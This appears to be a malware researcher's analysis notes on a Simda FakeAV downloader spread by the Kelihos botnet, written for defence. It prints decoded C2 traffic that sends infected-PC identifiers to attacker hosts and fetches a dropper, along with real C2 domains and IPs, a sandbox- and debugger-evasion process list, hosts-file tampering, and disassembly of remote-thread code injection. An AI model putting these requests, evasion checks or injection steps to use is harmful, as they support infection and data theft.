- // =========================================
- // #MalwareMustDie!
- // Kelihos botnet served payload analysis
- // Simda payload, downloader of FakeAV
- //
- @unixfreaxjp /malware/temp]$ date
- Mon Feb 10 21:14:53 JST 2014
- // =========================================
- // first the sample info + VT link:
- -----------------------------------------------------------
- Sample : ./sample.mmd
- MD5 : 2cc3c5c253997c73781de81bf0cdd405
- SHA256 : bd82111305cbaf7c5fd1d33f3e7f55f3f7b8a2ed402abd4ede0adeb3037960c9
- VT URL : https://www.virustotal.com/en/file/bd82111305cbaf7c5fd1d33f3e7f55f3f7b8a2ed402abd4ede0adeb3037960c9/analysis/1392034168/
- Detection ratio: 31 / 50
- -----------------------------------------------------------
- // main course...
- //================================
- // Decoding of the CNC Traffic
- // Compare the traffic to reverse
- // binary result to get the crack
- // logic.
- //
- // Noted: I did this "my way"
- // Adding here and there analysis to -
- // find something new..
- //================================
- // ---------------------------------------
- // TRAFFIC #1
- // requesting for the setup beacon..
- // ---------------------------------------
- GET /?7y31731=%96%C9%A5%A6%A6%D8c%AA%A6%97%9B%D8ll%9B%9
- 8%AFf%98m%CE%DE%5E%98%A3%A1%9D%DEi%93l%96%97%98%DC%E6%A
- C%E9%EA%86%C7%99%AA%9E%D7rffh%AFf%5B%A1%DB%E0k%C7%D4%9A
- z%C1Y%9E%A0%97n%A6%A9%B5%A5%B5%ADd%AD%ACwh%B4l%7Bmz%B1l
- wf%B3%AAa%A4%A3%B3n%BCwjjvW%E4%CA%E3%AC%A2%A4%5E%A7%A3h
- f%A3eeef%A9eee%9D%A9%5E%93%95%E3t%A9cagcb%B8%9B%96%E1%E
- C%B1a%A9%97 HTTP/1.1
- Host: report.ws55s5555y555my.com
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
- Trident/4.0;
- .NET CLR 2.0.50727;
- .NET CLR 1.1.4322;
- .NET CLR 3.0.04506.590;
- .NET CLR 3.0.04506.648;
- .NET CLR 3.5.21022;
- .NET CLR 3.0.4506.2152;
- .NET CLR 3.5.30729)
- // Reversed..
- //...shows the domain (the same domains as captured)
- 4258f0: report.ws55s5555y555my.com <=== good, got the howtos here..
- //next...with cracked urls:
- 4114f8: /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 <== #w000t!!
- //templates:
- $%s&controller=sign&data=%s&oldmid=%s&mid=%s$
- // ---------------------------------------
- // TRAFFIC #2
- // POSTING the Infection PC ID..
- // ---------------------------------------
- POST / HTTP/1.1
- Host: report.ws55s5555y555my.com
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
- Trident/4.0;
- .NET CLR 2.0.50727;
- .NET CLR 1.1.4322;
- .NET CLR 3.0.04506.590;
- .NET CLR 3.0.04506.648;
- .NET CLR 3.5.21022;
- .NET CLR 3.0.4506.2152;
- .NET CLR 3.5.30729)
- Content-Length: 5476
- Content-Type: application/x-www-form-urlencoded
- 31yWS=%96%97%D1%D3%A3%AA_%AA%A7hi%D6feg%97%A9eln%CE%B1b
- %94%D3%CE%94%96%AC%BB%88%A2%95%96%E1%D3%EBk%EA%E1fe%A3n
- gnn%AFmi%94%E4%E2_%95%A8%A5ic%B2%8C%84%A2%9E%A1%9F%AB%A
- 7e%AC%A3%94%A4%E0kkhf%B2nik%A1%A9%5E%95%A0%A5ib%B2%8B%8
- 8%A9%9D%A6%9F%A3%AC%8F%AE%A3%98b%D8%96%9Aib%ADeil%9A%DA
- d%9C%A6%9A%95%97%DC%8D%B6%A8%96%A2%A8%D6%A7%91%D6%D2if%
- A7iebi%AAibi%9E%ADb%93%A7%A2%60e%AA%8B%87%A2%C4%CF%A2%A
- 4%AD%5E%AD%ABfj%A5%5B%AC%ABr%F0%AB%8D%85%93%EE%97%C7%AC
- %9Edd%AF%88y%DE%D3%D7%AC%D6%D9%5B%BA%BB%5B%A2%DC%99riy%
- BEkxn%A3%AFg%A5%A2%AEjw%B1%9C%8B%A9%A7%A1%B5%A3%A7o%AB%
- B9lx%B7nhx%5B%EB%9A%A8r%9D%A9%5E%93%9F%A0da%A9%87%83%A3
- %95%A0%9F%A2%A4%5E%A7%A3%5B%AB%B0eeee%A9f%7Bk%93%EB%A8%
- A0%A2%9FY%A3%DE%C7%C2%E4%D9%AD%C2%E1%DA%A2%C0%E1%A8%A9%
- D4%A1%A1%5B%A8%E8%9B%A9r%AE%DD%9D%C5%D4%8Dy%9D%DA%CA%BB
- %92%B5%DC%D0%EB%D9%A0%97%A4fU%B4%98%A9%9E%AB%DE%8DB%3F%
- AE%CDw%83%9C%8Dw%9A%DE%C5%C6%E6%D5%E2%DE%D9%E6%8F%E4%E0
- U%AF%E8%A7Uy%9A%E2%A3%A8%A9%CE%E5%9A%C4%E3%D6%A2%9F%99%
- BB%B8%E4%85%C3%DE%D8%E8%A5%D8%E5%9AB%7Dv%AA%A9%A4%C2%A9
- U%AB%A0%A7a%91%A7%9Bd%3E%83%9A%96%DE%CA%D1%DD%D7%E6%3B%
- 81%BC%A3%A9%D8%A1%5D%87%5E%99%7C%A7%96%DD%E1%97%C6%E2%8
- D%80%96%DD%C0%B4%92%A6%D3%D2%D7%E0%93%E9%D4%A9%A4%E5Uy%
- A7%9E%EF%9A%A7Bw%C2%9C%D7%D4%D9%E1Q%C6%B8%C1%D3%CC%D5%D
- C%D7%E2%A2%A4%B8%A3%9C%DC%A3%9Ab~%E7%A9%9A%A7%D3%DA%91%
- C8%7Cw%8A%9A%E7%BB%C2%E9%D8%90%B8%E0%E8%93%E9%E1%9A%A9%
- 93z%AD%A5%A1%E8%A7%9A%A7%8D%B1%3Bm%C2%D6%96%99%DE%C9%BB
- %D7%CE%E4%E2%E7%E4%92%D8%E7%9AU%D9%31%A7U%8C%E2%A3%99%A
- 4%E4%ECN%AC%DD%E1%98%A3%E7%BC%C7%92%AA%E8%DF%DE%E3%A0%D
- C%E5Um%93%5D%80wg%ADnlk%A1%A9Wpy%C0%9C%94%E1%BC%C5%DA%C
- A%D9%E3%E5%E9%9E%DB%D4%A9%9A%93%9B%31%A7U%D0%9E%A3%99%D
- C%F0%A1%83%B8%DB%A7%96%EB%C5%B8%E6%85%B5%E7%E2%E0%9D%E9
- %D8%A7U%ABU%5D%80w%ABjfe%A2%AC_%8C%7Cw%7B%A0%ED%BD%BC%E
- A%85%D6%6B%E4%94%85%E0%E1%99%A4%EA%A8U%8D%85%99%5D%80w%
- A6%AFg%93%A7%A1%5C%3E%83%A0%C1%E6%CA%DC%1D%92%B5%91%EB%
- DC%AB%9A%A0%82%96%A3%96%E0%9A%A2%9A%DB%ED%5B%B7%D4%D0%9
- B%9F%E8%C3%C2%D9%CE%D5%7C%7C%C1%97%DA%E5%A4%A8%E2%9B%A9
- Uc%C7z%89U%B3%EB%8F%D0%D4%E4%A2%A3%E4w%86%A0%9A%90%BB%D
- 3%E2%95%EC%D4%9C%9A%93%85%96%98%A0%99%88%85f%8D%A6N%A7%
- B4%C2%40%3B%C6%C0%B6%E4%D4%E3%DE%D8%E8N%A5%C1z%89%93%7B
- %A7%96%A2%DE%AC%A4%A7%D8%99a%91%A4%8D%86%81%AAd%5D%BF%C
- E%D3%E1%E1%E7%9D%DD%E7Ux%E2%A2%A5%A7%9A%EC%A8%9E%A4%DB%
- 99q%CF%D8%D2%A1%A5%99%A7%B4%D5%D0%90%A0%A0%A4N%DD%E2%A7
- U%CA%9E%A3%99%A4%F0%A8U%8D%BD%868%BA%D8%DB%97%A0%F0%CAs
- %BF%CA%D4%D8%D3%94t%E6%E5%A2%96%E7UffU%EB%AA%A3%A9%D6%E
- 6%93py%C4%9C%9F%DD%C6%CA%E5%85%BD%D4%D6%DD%8F%97%C3%A1%
- 96%EC%9A%A7Uf%AAB%3F%82%D6%DC%A0%D2%E2%DC%99%A5%99%AC%C
- 6%D7%D7%9D%BC%E1%D8%93%97%B7%A7%9E%E9%9A%A7U%7B%EB%96%A
- 2%9A%E4%E8%A0%CE%8F%B3%98%92%ED%CC%C5%D7%85%C0%D0%D5%DF
- N%A8%A1eB%7D~%A3%A9%9A%E5%5D%87%5E%8D%C9%80%B2%8F%BB%98
- %A5%F0%C6%C5%DD%85%B3%DE%E0%E2%93%DA%E7%9E%A4%E1%A8Ufg%
- A7fcf%9F%A7%5Epy%BA%9C%94%EB%C6%C6%E1%CB%E4%8F%C1%DA%94
- %E0%D6%9AU%C3%A7%A4%9B%9A%EC%A8%9E%A4%DB%DA%9A%83%B4%D1
- %9C%A5%E2%C6%C1%92%97%A0%9F%A5%818%CE%DC%A3%97%E2%A3%99
- U%89%C9%82Uy%D2%EF%97%C6%D4%8Dw%A3%E2%CD%B8%E4rz%C6%DB%
- E2%92%E6%EA%A8U%B7%9A%9B%9A%A3%DD%9A%A7Bw%C6%97%C6%E1%D
- C%A6%A0%DF%CBs%A0%B3%B5%C3%92%BA%A0%D8%E0%9A%AC%E2%A7%A
- 0Uh%A7eU%88%D2%EB%A4%CC%D2%D2S%81%DA%BA%BE%92%97%7Dy%B3
- %D8%9D%D9%D8U%87%D8%96%99%9A%A7%99nci%9B%A9%3Bm%BC%D6%9
- 6%A3%E8%CA%C2%D8%D9%90%9D%C0%B9%82%97%B9%A7%96%E0%9A%AC
- %A4%A7%E4Ugc%9D%99%81%C8%E1%E3%9C%94%DEw%A3%D3%C8%DB%8F
- %A4%818%C4%DC%98%A7%E2%A8%A4%9B%A9%99c%83z%C1%99t%D5%D0
- %DA%98%A8%E8%C9%BE%92%98%9E%9F%92%C7%93%E9%E9%9E%98%D8U
- %85%96%98%E4UgU%B9%DA%9C%CA%E4%CE%9A%96%99%A7%B4%D5%D0%
- 90%9C%92%B8s%CC%80%3F%82%DC%98%A7%A4%A8%E8%9B%A9U%9B%C7
- s%B7%8F%B3%A5%92%E6%BC%CA%E1%D7%DB%8F%A4%A2%5E%97%C6%9A
- %A7%E9%9E%98%9AU%C9%96%98%A0%8D%ABN%AF%D0%DB%9A%A6%DA%B
- E%B8%92%B5%D1%D2%DD%94%5B%97%B7z%8A%80%3F%89%AC%9A%DA%A
- 0%AA%9E%8D%C9%9D%DA%D4%DF%A7%A0%F2w%B9%E1%D7%90%C6%DB%E
- 2%92%E6%EA%A8U%CB%85B%3F%88%DE%98%AA%A7%D6%ED%A7%83%C4%
- DD%97%92%ED%BCs%D8%D4%E2%8F%BF%DD%91%E9%E2%A8%A4%D9%A9U
- c%83%BE%89U%7B%DF%DA%9B%C8%E6%DC%A5%9C%99%8A%81%A7%85%C
- 3%BF%A3%94V%C2%B5gi%A4kilh%A2B%3F%7D%DC%ED%94%CC%E7%8D%
- 99%A0%EBw%A0%DB%C8%E2%DE%E5%E3%94%EB%93c%83%B8%89U%7B%A
- 7%DA%A2%9A%AC%DC%EB%99%83%A2%9BhQ%CC%A7%84%92%8D%BB%B1%
- AB%A9a%AC%ACj%5E%80%3F%7D%A4%A9%DF%9E%ADU%D3%E8%A0%83%B
- C%D6%96%A3%E8%CA%C2%D8%D9%90%9D%C0%B9%82%97%B9%A7%96%E0
- %9A%AC%A4%A7%E4Uhc%A2%99%81%B3%A0%8D%5B%7C%BB%90%88%AA%
- 99%A8%A3%9B%818%CA%E2%AA%A3%D7%82v%8DB%83%82%9E%98%DF%E
- 8%A1%D2%D5%E1S%87%E2%CA%C8%D3%D1%90%B2%9D%9FN%A9%A3fe%9
- 3U%ADmk%99%87%9A%99%D6%EC%A2%D5%D8%CF%A8%A5%DA%B9%BF%D7
- %85%9D%8F%A3%A4%5C%A7%A1ie%A5fnB%3F%9F%A5%A7%A4%D0%B6%8
- 9%B6%E8%E0%A7%96%E6w%A3%E4%D4%D3%D4%E5%E7%8B%84%7D%88%A
- E%E6%A9%9A%A2B%83%A8%A2%A8%E0%A7%93%DB%D4z%3D%94%EC%C9%
- C6%E5%93%D5%E7%D7%818%EE%DC%A3%A1%E2%9C%A4%A3c%DE%AD%9A
- Bw%EC%93%D5%E5%D6%96%96%EC%85%B8%EA%CA%7Dy%DE%E7%8F%EA%
- E6c%9A%EB%9AB%3Fy%BF%88%9A%A7%E3%A7%93%DB%D4z%3D%A4%EF%
- BA%BB%E1%D8%E4%9D%D7%EC%93%84%7D%A8%AB%D6%9D%A4%A8%A9%A
- 7%9A%AD%9Az%83%A1%D9%D2%D5%A2%A4%ED%85%B8%EA%CA%7Dy%E5%
- EA%91%DF%E2%A8%A9%A1%9A%AD%9AB%83%9A%AD%A5%D9%E8%A0%C8%
- E1%9B%98%A9%DEd%5D%E5%D5%DF%DE%DE%E7%A4%A5%D8%AD%9A%80%
- 3F%A8%A2%96%F1i%A5%A3%DD%A7%93%DB%D4z%3D%84%C6%B8%CB%A6
- %93%D5%E7%D7%818%DA%E7%9B%A2%E2%A3c%9A%AD%DEB%3F%A7%E2%
- E7%92%CF%DB%A0e_%DE%CF%B8%7Fo%E3%E5%D5%DC%9D%EA%E7c%9A%
- EB%9AB%3F%96%ED%98%9D%A0%E0%EB%A4%91%D4%E5%98%3E%83%A3%
- A0%C5%93%D5%E7%D7%818%CC%C1%88c%D8%AD%9AB%3F%DA%A1%9Cc%
- D2%F1%93py%B3%A5%AB%CC%CB%B4%E6%CA%A2%DA%A0%D9%A6%DC%80
- %3F%AC%E0%9E%A5%A7%AB%EC%9Ac%9A%E5%DE%3Bm%C2%E6%A6%A5%D
- E%C4%60%7C%B8%E9%E2%E6%D9%9B%84%7D%88%AE%E6%A9%9A%A2B%8
- 3%88%AE%A8%E1%DE%9Bpy%C0%AC%A4%ED%BC%C0%7Fo%E7%DC%DB%E4
- %A0%ED%E6%9Ac%D8%AD%9AB%3F%CC%AE%A8%A9%D2%E6%3Bm%D0%D4%
- A1%96%EC%CB%BC%A0%CA%E8%D4%7F~R
- // Template of this POST command is:
- 410fe8: POST %s HTTP/1.1 Host: %s User-Agent: %s
- Content-Length: %d
- Content-Type: application/x-www-form-urlencoded
- %s
- // values decrypted is:
- 4259f0: wv=wvXP&
- uid=11361&
- lng=de-CH&
- mid=4DE6C9669B3A7F8E87B1F13A4F7CD93C&
- res=00000320000100000000&
- v=000001F6
- &rz=32
- //template grabbed in reversing:
- 411198: wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X&rz=%d
- // [...] and so on.. (I think ↑ is enough for evidence..)
- // Obviously infected PC information was sent..
- // ---------------------------------------
- // REQUEST #3
- // Here goes the FakeAV mess....
- // ---------------------------------------
- GET /?de=kayoyZWnmmKfmJikqpfJ2m6nl2qmpGeZ0qTZ0cnCqZuRkc
- jS3evY0%2BCk1KZ26NiV0ZXR1uTFnsfZY9KazZ%2FiqZ3NdZWjpdncl
- 8espK3VmJSpmWKempiiqMvKqnDSZWqqqGTGptHW1cWWqshU2M7HrKuq
- qap7qGpvrrFhpKazrbWcmLaWdJyYpKO9nae4caJ3XQ%3D%3D HTTP/1.1
- Host: update.kecowfdt8o49uo.com // does not exist!!
- User-Agent: Mozilla/5.0 (Windows NT 6.1;
- WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
- Connection: Keep-Alive
- // Reversed...
- Coded template:
- 410ac8: update%s.%s.com <=== we know how the decode form
- // Thanks to the hosts-file overwrite, the access reached the mother host!!
- // Response:
- HTTP/1.1 200 OK
- Server: nginx
- Date: Mon, 10 Feb 2014 10:07:09 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: close
- X-Powered-By: PHP/5.3.16
- 80
- 2513465194980a70c6d814d5db21b2432f5b82a099664ea242f5bd0
- 20459550cb45a50e1c47aac060a347d652cf549e2869ddb7e020995
- 2b573f8a370fe58f9d
- 0
- // so ..hostname are encoded..
- // cracked:
- http://update1.highguarded.com // <=== #w00tw00t!!
- // The GET request also uses a different encoding; cracked:
- /?abbr=RTK&action=download&setupType=drop64&setupFileName=dropper64.exe #w00tw00t!!
- //PoC:
- http://urlquery.net/queued.php?id=65248966
- https://www.virustotal.com/en/url/8363fdd4899e1f544f4f2b626ce985be85f4cfab0e62ce3f33ac05df4b496280/analysis/1392037874/
- // traces of binary saved:
- 4114b5: %temp%\11361.sys
- 4114a8: %temp%/update_c1eec.exe
- 4123c8: %appdata%\ScanDisc.exe
- // maybe changes(random), has seeds..go figure?
- // PS: These "WannaFoolMe" requests are fakes.. Noted: MMD is not that easily fooled:
- 411394: Host: update1.randomstring.com User-Agent: IE7
- 411394: Host: update1.randomstring.com User-Agent: IE7
- 411554: Host: update1.randomstring.com User-Agent: IE7
- 4114c4: Host: update1.randomstring.com User-Agent: IE7
- [...]
- //---------------------------------------
- // ETC TRAFFIC...
- // AND THE NEXTS (REQUEST OF SAME PATTERN)
- // ---------------------------------------
- GET /?I17q20=%96%C6%A6%A6%A6%D9%60%AF%A3el%D8%9B%99hj%A
- C%96im%D2%DCe%96%D1%A2%7C%97k%A6bh%D6%8B%E7%E5%AF%EB%A4
- %CF%C3%5B%AA%DC%99rff%ACkf%5B%D9%E7%95%A0%D3%D2vt%7F%97
- %9F%99%D6%A2%A4%B3%B7%AAq%B0%A9kn%B5hvl%7B%B1zml%AF%AAt
- %94%A2%AE%7Dwn%B4vi%A5%A8%96%E1%D7%E7k%A7%A3ee%A3geee%A
- 9efe%9D%A9%5E%93%9F%9DyW%AD%AEb%60%A2%95%A0%A0%B8%AAT%E
- 9%EDrh%A5Y HTTP/1.1
- Host: report.ws55s5555y555my.com
- User-Agent: Mozilla/4.0 (compatible; MSIE 8.0;
- Trident/4.0;
- .NET CLR 2.0.50727;
- .NET CLR 1.1.4322;
- .NET CLR 3.0.04506.590;
- .NET CLR 3.0.04506.648;
- .NET CLR 3.5.21022;
- .NET CLR 3.0.4506.2152;
- .NET CLR 3.5.30729)
- (( no response..is a beacon, leave it!))
- // Autoruns..
- 413fb0: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- // Spam trace???.. hmm..not good!!
- //..partial decoded strings..
- 41134c: v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all
- // payload was checking these applications:
- EtherD.exe
- Regshot.exe
- ollydbg.exe
- ZxSniffer.exe
- Syser.exe
- CamRecorder.exe
- wspass.exe
- SymRecv.exe
- SbieSvc.exe
- ERDNT.exe
- SandboxieDcomLaunch.exe
- irise.exe
- IrisSvc.exe
- vba32arkit.exe
- DrvLoader.exe
- SUPERAntiSpyware.exe
- %appdata%\ScanDisc.exe
- VBoxTray.exe
- tcpdump.exe
- SandboxieRpcSs.exe
- CamtasiaStudio.exe
- ERUNT.exe
- Sniffer.exe
- wireshark.exe
- dumpcap.exe
- VBoxService.exe
- cv.exe
- Aircrack-ngGui.exe
- WinDump.exe
- observer.exe
- windbg.exe
- PEBrowseDbg.exe
- // here is the responsible spot for getting the payload URL..
- // rewriting the "hosts" trace
- 413010: # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
- # source server
- 412c74: # Copyright (c) 1993-2006 Microsoft Corp.
- 413060: # This file contains the mappings of IP addresses to host names. Each
- 4131f4: # lines or following the machine name denoted by a # symbol.
- 412de0: # The IP address and the host name should be separated by at least one
- 412e2c: # space.
- 412ef8: # 102.54.94.97 rhino.acme.com
- 412f40: # 38.25.63.10 x.acme.com # x client host
- // added nasty stuff to download from update.kecowfdt8o49uo.com
- // Post Installation contacted IP:
- IP PORTS
- ------------------------
- 5.61.32.192 22
- 79.142.66.240 22 80 443
- 5.149.248.85 22 80
- 92.123.68.97 80 443
- // IP GEO info:
- 5.61.32.192||16265 | 5.61.32.0/20 | LEASEWEB | DE | 3NT.COM | 3NT SOLUTIONS LLP
- 79.142.66.240|hosted-by.altushost.com.|60778 | 79.142.64.0/22 | FELICITY | NL | ALTUSHOST.COM | ALTUSHOST B.V.
- 5.149.248.85||59711 | 5.149.248.0/23 | FORTUNIX | NL | HOSTZEALOT.COM | FORTUNIX NETWORKS L.P.
- 92.123.68.97|a92-123-68-97.deploy.akamaitechnologies.com.|1299 | 92.123.68.0/24 | TELIANET | GB | AKAMAI.COM | AKAMAI TECHNOLOGIES
- // ADDITIONALS..PERSONAL MEMOs....
- // OpenSearch XML in the binary builder for traces??? #LOL
- 40c674: </Arguments </Exec </Actions </Task <!--00--
- 40c3ec: <Actions
- 4138bc: <Param name="q" value="{searchTerms}"/
- 4134bc: <DescriptionSearch for the best price.</Description
- 413540: <Image width="16" height="16"data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8
- 41384f: e2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image
- // Code injection w/WriteProcessMemory(KERNEL32.DLL)
- Code function: 0_2_0x4092CB VirtualAllocEx,GetLastError
- ,GetLastError,CloseHandle,WriteProcessMemory,GetLastErr
- or,CloseHandle,GetModuleHandleW,GetProcAddress,CreateRe
- moteThread,GetLastError,CloseHandle,CloseHandle,WaitFor
- SingleObject,CloseHandle
- 0x40930F call dword ptr [0x40C0C8h] "VirtualAllocEx@KERNEL32.DLL" (Import, 5 Params)
- 0x409315 mov esi, dword ptr [0x40C180h] "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
- 0x40931B mov dword ptr [ebp-08h], eax
- 0x40931E call esi "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
- 0x409320 mov dword ptr [ebp-0Ch], eax
- 0x409323 cmp dword ptr [ebp-08h], ebx
- 0x409326 jne 0x40933Dh target: 0x40933D
- 0x409328 push dword ptr [ebp-04h]
- 0x40932B call dword ptr [0x40C130h] "CloseHandle@KERNEL32.DLL" (Import, 1 Params)
- 0x409331 mov dword ptr [004257ECh], 00000007h
- 0x40933B jmp 0x4093B2h target: 0x4093B2
- 0x40933D push ebx xref: 0x409326
- 0x40933E push edi
- 0x40933F push dword ptr [ebp+08h]
- 0x409342 mov edi, dword ptr [ebp-04h]
- 0x409345 push dword ptr [ebp-08h]
- 0x409348 push edi
- 0x409349 call dword ptr [0x40C0BCh] "WriteProcessMemory@KERNEL32.DLL" (Import, 5 Params) ?? <=== here..
- 0x40934F test eax, eax
- // Code Execution "ShellExecuteW"
- Code function: 0_2_0x4033C0 DialogBoxParamW,memset,mems
- et,memset,wcsstr,wsprintfW,ExpandEnvironmentStringsW,Co
- pyFileW,wsprintfW,ShellExecuteW,GetLastError,
- 0x4033C0 push ebp xref: 0x402626
- 0x4033C1 mov ebp, esp
- 0x4033C3 sub esp, 00000618h
- 0x4033C9 push esi "DialogBoxParamW@USER32.DLL" (Import, 5 Params)
- 0x4033CA push edi
- 0x4033CB xor eax, eax
- 0x4033CD mov esi, 00000206h
- 0x4033D2 push esi
- 0x4033D3 xor edi, edi
- 0x4033D5 mov word ptr [ebp-00000208h], ax
- 0x4033DC lea eax, dword ptr [ebp-00000206h]
- 0x4033E2 push edi
- 0x4033E3 push eax
- 0x4033E4 call 0x40B208h "memset@MSVCRT.DLL" (Import, 0 Params) target: 0x40B208
- 0x4033E9 xor eax, eax
- 0x4033EB push esi
- 0x4033EC mov word ptr [ebp-00000410h], ax
- 0x4033F3 lea eax, dword ptr [ebp-0000040Eh]
- 0x4033F9 push edi
- 0x4033FA push eax
- 0x4033FB call 0x40B208h "memset@MSVCRT.DLL" (Import, 0 Params) target: 0x40B208
- 0x403400 xor eax, eax
- 0x403402 push esi
- 0x403403 mov word ptr [ebp-00000618h], ax
- 0x40340A lea eax, dword ptr [ebp-00000616h]
- 0x403410 push edi
- 0x403411 push eax
- 0x403412 call 0x40B208h memset@MSVCRT.DLL (Import, 0 Params) target: 0x40B208
- 0x403417 push 00413EA0h UTF-16 "Temp\Low"
- 0x40341C mov esi, 00414910h UTF-16 "C:\agnesti.exe"
- 0x403421 push esi UTF-16 "C:\agnesti.exe"
- 0x403422 call dword ptr [0x40C370h] "wcsstr@MSVCRT.DLL" (Import, Unknown Params)
- 0x403428 add esp, 2Ch
- 0x40342B test eax, eax
- 0x40342D je 0x40348Bh target: 0x40348B
- 0x40342F push 00000009h
- 0x403431 lea eax, dword ptr [ebp-00000410h]
- 0x403437 push eax
- 0x403438 push 00000005h
- 0x40343A pop eax
- 0x40343B call 0x4068FEh target: 0x4068FE
- 0x403440 lea eax, dword ptr [ebp-00000410h]
- 0x403446 push eax
- 0x403447 push 00413EB4h UTF-16 "%TEMP%"
- 0x40344C lea eax, dword ptr [ebp-00000618h]
- 0x403452 push 00413EC4h UTF-16 "%s\%s.exe"
- 0x403457 push eax
- 0x403458 call dword ptr [0x40C248h] "wsprintfW@USER32.DLL" (Import, 0 Params)
- 0x40345E add esp, 10h
- 0x403461 push 00000104h
- 0x403466 lea eax, dword ptr [ebp-00000208h]
- 0x40346C push eax
- 0x40346D lea eax, dword ptr [ebp-00000618h]
- 0x403473 push eax
- 0x403474 call dword ptr [0x40C1A4h] "ExpandEnvironmentStringsW@KERNEL32.DLL" (Import, 3 Params)
- 0x40347A push edi
- 0x40347B lea eax, dword ptr [ebp-00000208h]
- 0x403481 push eax
- 0x403482 push esi UTF-16 "C:\agnesti.exe"
- 0x403483 call dword ptr [0x40C16Ch] "CopyFileW@KERNEL32.DLL" (Import, 3 Params) //<== See??
- 0x403489 jmp 0x4034A1h target: 0x4034A1
- 0x40348B push esi UTF-16 "C:\agnesti.exe" xref: 0x40342D
- 0x40348C lea eax, dword ptr [ebp-00000208h]
- 0x403492 push 00413ED8h
- 0x403497 push eax
- 0x403498 call dword ptr [0x40C248h] "wsprintfW@USER32.DLL" (Import, 0 Params)
- 0x40349E add esp, 0Ch
- 0x4034A1 push 00000003h xref: 0x403489
- 0x4034A3 push edi
- 0x4034A4 push 00413B60h UTF-16 "/param"
- 0x4034A9 lea eax, dword ptr [ebp-00000208h]
- 0x4034AF push eax
- 0x4034B0 push 00413EE0h UTF-16 "runas"
- 0x4034B5 push edi
- 0x4034B6 call dword ptr [0x40C21Ch] "ShellExecuteW@SHELL32.DLL" (Import, 6 Params) // <=== See??
- 0x4034BC cmp eax, 20h
- 0x4034BF jnle 0x4034C9h target: 0x4034C9
- 0x4034C1 call dword ptr [0x40C180h] "GetLastError@KERNEL32.DLL" (Import, Unknown Params)
- 0x4034C7 mov edi, eax
- 0x4034C9 mov eax, edi xref: 0x4034BF
- 0x4034CB pop edi
- 0x4034CC pop esi
- 0x4034CD leave
- 0x4034CE ret function end
- // Remote Process(Read: thread) Writing:
- Code function: 0_2_0x4092CB VirtualAllocEx,GetLastError
- ,GetLastError,CloseHandle,WriteProcessMemory,GetLastErr
- or,CloseHandle,GetModuleHandleW,GetProcAddress,CreateRe
- moteThread,GetLastError,CloseHandle,CloseHandle,WaitFor
- SingleObject,CloseHandle,
- 0x409371 push 0x40CAB8h ASCII "LoadLibraryW"
- 0x409376 push 0x40CAC8h UTF-16 "kernel32"
- 0x40937B call dword ptr [0x40C158h] "GetModuleHandleW@KERNEL32.DLL" (Import, 1 Params)
- 0x409381 push eax
- 0x409382 call dword ptr [0x40C0E8h] "GetProcAddress@KERNEL32.DLL" (Import, 2 Params)
- 0x409388 push eax
- 0x409389 push ebx
- 0x40938A push ebx
- 0x40938B push edi
- 0x40938C call dword ptr [0x40C0D0h] "CreateRemoteThread@KERNEL32.DLL" (Import, 7 Params) // <<== here here!
- 0x409392 mov dword ptr [ebp+08h], eax
- 0x409395 call esi GetLastError@KERNEL32.DLL (Import, Unknown Params)
- 0x409397 mov esi, dword ptr [0x40C130h] CloseHandle@KERNEL32.DLL (Import, 1 Params)
- // Downloading via WININET.DLL...
- 0040A4CA call dword ptr [0040C268h] "InternetConnectA@WININET.DLL" (Import, 8 Params)
- 0040A4D0 mov dword ptr [ebp-18h], eax
- 0040A4D3 cmp eax, ebx
- 0040A4D5 je 0040A610h target: 0040A610
- 0040A4DB push esi ASCII "79.133.196.94"
- 0040A4DC push 00000001h
- 0040A4DE push 00400000h
- 0040A4E3 push ebx
- 0040A4E4 push ebx
- 0040A4E5 push ebx
- 0040A4E6 push dword ptr [ebp+10h]
- 0040A4E9 push 00410A4Ch ASCII "GET"
- 0040A4EE push eax
- 0040A4EF call dword ptr [0040C278h] "HttpOpenRequestA@WININET.DLL" (Import, 8 Params)
- 0040A4F5 mov esi, eax
- 0040A4F7 mov dword ptr [ebp+08h], esi
- 0040A4FA cmp esi, ebx
- 0040A4FC je 0040A602h target: 0040A602
- 0040A502 push dword ptr [ebp+14h]
- 0040A505 lea eax, dword ptr [ebp-00000118h]
- 0040A50B push 00410A50h ASCII "Host: %s"
- 0040A510 push eax
- 0040A511 call dword ptr [0040C2E0h] sprintf@MSVCRT.DLL (Import, 0 Params)
- 0040A517 add esp, 0Ch
- 0040A51A push A0000000h
- 0040A51F push FFFFFFFFh
- 0040A521 lea eax, dword ptr [ebp-00000118h]
- 0040A527 push eax
- 0040A528 push esi
- 0040A529 call dword ptr [0040C27Ch] "HttpAddRequestHeadersA@WININET.DLL" (Import, 4 Params)
- 0040A52F test eax, eax
- 0040A531 je 0040A5F4h target: 0040A5F4
- 0040A537 push ebx
- 0040A538 push ebx
- 0040A539 push ebx
- 0040A53A push ebx
- 0040A53B push esi
- 0040A53C call dword ptr [0040C274h] "HttpSendRequestW@WININET.DLL" (Import, 5 Params)
- 0040A542 test al, al
- 0040A544 je 0040A5F0h target: 0040A5F0
- 0040A54A mov esi, 00000082h
- 0040A54F push esi
- 0040A550 call dword ptr [0040C2E8h] malloc@MSVCRT.DLL (Import, 0 Params)
- 0040A556 push esi
- 0040A557 push ebx
- 0040A558 push eax
- 0040A559 mov dword ptr [ebp+10h], eax
- 0040A55C mov dword ptr [edi], eax
